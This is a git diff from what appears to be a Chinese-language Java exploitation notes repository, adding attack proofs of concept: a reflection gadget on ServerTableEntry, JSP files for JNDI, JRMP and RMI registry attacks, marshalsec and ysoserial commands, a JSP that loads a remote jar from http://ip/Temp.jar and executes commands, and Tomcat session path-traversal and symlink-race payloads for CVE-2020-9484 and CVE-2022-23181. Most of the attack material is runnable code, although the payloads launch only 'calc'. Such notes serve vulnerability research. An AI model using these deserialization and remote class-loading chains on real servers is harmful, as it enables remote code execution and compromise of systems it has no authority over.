java.lang.reflect.Method; +import java.util.logging.Logger; + +public class servertableentry { + public static void main(String[] args) throws Exception{ + Class C = Class.forName("com.sun.corba.se.impl.activation.ServerTableEntry"); + Constructor declaredConstructor = C.getDeclaredConstructor(ActivationSystemException.class, int.class, ServerDef.class, int.class ,String.class , boolean.class, boolean.class ); + declaredConstructor.setAccessible(true); + Class l = Class.forName("java.util.logging.Logger"); + Constructor declaredConstructor1 = l.getDeclaredConstructor(String.class); + declaredConstructor1.setAccessible(true); + Logger o1 = (Logger)declaredConstructor1.newInstance("Firebasky"); + ActivationSystemException activationSystemException = new ActivationSystemException(o1); + ServerDef serverDef = new ServerDef(null,null,"C:\\",null,null); + Object o = declaredConstructor.newInstance(activationSystemException, 0, serverDef, 0, "", false, false); + Field activationCmd = C.getDeclaredField("activationCmd"); + activationCmd.setAccessible(true); + activationCmd.set(o,"calc"); + Method verify = C.getMethod("verify"); + verify.invoke(o); + } +} diff --git a/shell/jndi/client.jsp b/shell/jndi/client.jsp new file mode 100644 index 0000000..2bb7178 --- /dev/null +++ b/shell/jndi/client.jsp @@ -0,0 +1,8 @@ +<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*,java.beans.*,java.lang.*,java.rmi.*,java.rmi.server.*,java.rmi.registry.*,javax.naming.*"%> +<% +System.setProperty(Context.INITIAL_CONTEXT_FACTORY,"com.sun.jndi.rmi.registry.RegistryContextFactory"); +System.setProperty(Context.PROVIDER_URL,"rmi://127.0.0.1:1099"); +Context ctx = new InitialContext(); +Object obj = ctx.lookup("Exploit"); +System.out.println(obj.toString()); +%> diff --git a/shell/jndi/yso.txt b/shell/jndi/yso.txt new file mode 100644 index 0000000..67d1513 --- /dev/null +++ b/shell/jndi/yso.txt @@ -0,0 +1 @@ +java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://ip/#Exploit diff --git a/shell/jrmp/client.jsp b/shell/jrmp/client.jsp new file mode 100644 index 0000000..4686445 --- /dev/null +++ b/shell/jrmp/client.jsp @@ -0,0 +1,19 @@ +<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*,java.beans.*,java.lang.*,java.rmi.*,java.rmi.server.*,java.rmi.registry.*"%> +<% +String host = "127.0.0.1"; +int port = 8855; + +ObjID id = new ObjID((new Random()).nextInt()); +sun.rmi.transport.tcp.TCPEndpoint te = new sun.rmi.transport.tcp.TCPEndpoint(host, port); +sun.rmi.server.UnicastRef ref = new sun.rmi.server.UnicastRef(new sun.rmi.transport.LiveRef(id, te, false)); +RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref); + +ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); +ObjectOutputStream outStream = new ObjectOutputStream(new BufferedOutputStream(byteArrayOutputStream)); +outStream.writeObject(obj); +outStream.flush(); +outStream.close(); + +ObjectInputStream in = new ObjectInputStream(new BufferedInputStream(new ByteArrayInputStream(byteArrayOutputStream.toByteArray()))); +in.readObject(); +%> diff --git a/shell/jrmp/exp.txt b/shell/jrmp/exp.txt new file mode 100644 index 0000000..7cb08a0 --- /dev/null +++ b/shell/jrmp/exp.txt @@ -0,0 +1,14 @@ +java8 -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://ip/#Exploit + +public class Exploit { + public Exploit(){ + try{ + Runtime.getRuntime().exec("calc"); + }catch(Exception e){ + e.printStackTrace(); + } + } + public static void main(String[] argv){ + Exploit e = new Exploit(); + } +} diff --git a/shell/loadjar/Evil.java b/shell/loadjar/Evil.java new file mode 100644 index 0000000..85c3c63 --- /dev/null +++ b/shell/loadjar/Evil.java @@ -0,0 +1,8 @@ +package com.company; +import java.io.IOException; + +public class Evil { + public void exec(String cmd) throws IOException { + Runtime.getRuntime().exec(cmd); + } +} diff --git a/shell/loadjar/server.jsp b/shell/loadjar/server.jsp new file mode 100644 index 0000000..c09a38e --- /dev/null +++ b/shell/loadjar/server.jsp @@ -0,0 +1,9 @@ +<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*,java.beans.*,java.lang.*"%> +<% +out.println(222222222); +URL url = new URL("http://ip/Temp.jar"); +URLClassLoader loader = new URLClassLoader (new URL[] {url}); +Class cl = Class.forName ("com.company.Evil", true, loader); +Object evil = cl.newInstance(); +cl.getMethod("exec",String.class).invoke(evil,"calc"); +%> diff --git a/shell/rmi-registry-bind/server.jsp b/shell/rmi-registry-bind/server.jsp new file mode 100644 index 0000000..abba1d9 --- /dev/null +++ b/shell/rmi-registry-bind/server.jsp @@ -0,0 +1,14 @@ +<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*,java.beans.*,java.lang.*,java.rmi.*,java.rmi.server.*,java.rmi.registry.*"%> +<% +class ServerImp extends UnicastRemoteObject { + protected ServerImp() throws RemoteException { + } + +} +ServerImp server = new ServerImp(); +int port = 1099; +String registry_name = "rmi"; +Registry registry = LocateRegistry.createRegistry(port); +registry.bind(registry_name, server); +System.out.println("Port:1099,Name:rmi,Service Start!n"); +%> diff --git a/shell/rmi-registry-bind/yso.txt b/shell/rmi-registry-bind/yso.txt new file mode 100644 index 0000000..53d104c --- /dev/null +++ b/shell/rmi-registry-bind/yso.txt @@ -0,0 +1 @@ +java -cp ysoserial-all.jar ysoserial.exploit.RMIRegistryExploit 127.0.0.1 1099 Jdk7u21 "calc" diff --git a/tomcat/README.md b/tomcat/README.md index 1747bb3..c38371f 100644 --- a/tomcat/README.md +++ b/tomcat/README.md @@ -3,3 +3,6 @@ Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持,最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现,Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性能稳定,而且免费,因而深受Java 爱好者的喜爱并得到了部分软件开发商的认可,成为目前比较流行的Web 应用服务器Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。对于一个初学者来说,可以这样认为,当在一台机器上配置好Apache 服务器,可利用它响应HTML(标准通用标记语言下的一个应用)页面的访问请求。实际上Tomcat是Apache 服务器的扩展,但运行时它是独立运行的,所以当你运行tomcat 时,它实际上作为一个与Apache 独立的进程单独运行的 ![](./img/1.png) + + +[复现tomcat远程代码执行漏洞CVE-2016-8735](https://gv7.me/articles/2018/CVE-2016-8735/) diff --git a/tomcat/Smuggling/CVE-2021-33037.md b/tomcat/Smuggling/CVE-2021-33037.md new file mode 100644 index 0000000..7905c08 --- /dev/null +++ b/tomcat/Smuggling/CVE-2021-33037.md @@ -0,0 +1,4 @@ +Apache Tomcat HTTP请求走私(CVE-2021-33037)漏洞分析 + + +[Apache Tomcat HTTP请求走私(CVE-2021-33037)漏洞分析](https://xz.aliyun.com/t/9866) diff --git a/tomcat/Smuggling/CVE-2022-42252.md b/tomcat/Smuggling/CVE-2022-42252.md new file mode 100644 index 0000000..5430463 --- /dev/null +++ b/tomcat/Smuggling/CVE-2022-42252.md @@ -0,0 +1,3 @@ +https://www.xujun.org/note-154484.html + +![image](https://user-images.githubusercontent.com/63966847/201358116-b7c2e4de-0c57-461d-86b5-d370b62a5b6d.png) diff --git a/tomcat/Tomcat Session/Readme.md b/tomcat/Tomcat Session/Readme.md new file mode 100644 index 0000000..795e1d4 --- /dev/null +++ b/tomcat/Tomcat Session/Readme.md @@ -0,0 +1,36 @@ +# Tomcat Session + +``` +攻击者能够控制服务器上文件的内容和文件名称。 + +服务器PersistenceManager配置中使用了FileStore。 + +Tomcat依赖jar包中存在反序列化利用链。 + +攻击者知道使用的FileStore存储位置并且知道其目录下存在的任意文件名称。(CVE-2022-23181) + +满足条件竞争,创建Symlinks文件,并在完成文件验证后瞬间覆盖恶意序列化文件。(CVE-2022-23181) +``` + +## CVE-2020-9484 + +[Tomcat Session(CVE-2020-9484)反序列化漏洞复现](https://www.freebuf.com/vuls/245232.html) + +```xml +CVE-2020-9484 +JSESSIONID=../../../../tmp/exp.session +``` + +## CVE-2022-23181 + +[Apache Tomcat权限提升漏洞分析(CVE-2022-23181)](https://mp.weixin.qq.com/s/sQH0CbiSHdpsoJf7ABPrtA) + +```xml +CVE-2022-23181 +ln -s /Users/xxxx/java/soft/apache-tomcat-8.5.42/work/Catalina/localhost/ROOT/a.session ../../../tmp/exp.session +JSESSIONID=../../../tmp/exp.session +然后条件竞争去修改/tmp/exp.session +``` +**trick**: +new File("ceshi.session").getCanonicalFile() +如果是Symlinks文件就返回本来的文件名 diff --git a/wso2/Readme.md b/wso2/Readme.md new file mode 100644 index 0000000..1e02983 --- /dev/null +++ b/wso2/Readme.md @@ -0,0 +1,25 @@ +# wso2 + +## CVE-2022-29464 + +### 文件上传 + +路径匹配处理类 + +![image](https://user-images.githubusercontent.com/63966847/198697817-2f3055f2-5918-4336-bf73-71e500a1050b.png) + +![image](https://user-images.githubusercontent.com/63966847/198697831-7aeb695f-b02d-4a77-a403-562a37b4245f.png) + +### fix + +1.加了权限认证 + +2.对上传文件的路径做校验 + +### 参考 + +https://github.com/wso2/carbon-kernel/pull/3152/commits/13795df0a5b6a2206fd0338abfff057a7b99e1bb + +https://docs.wso2.com/m/mobile.action#page/180952746 + +https://www.anquanke.com/post/id/273528?from=timeline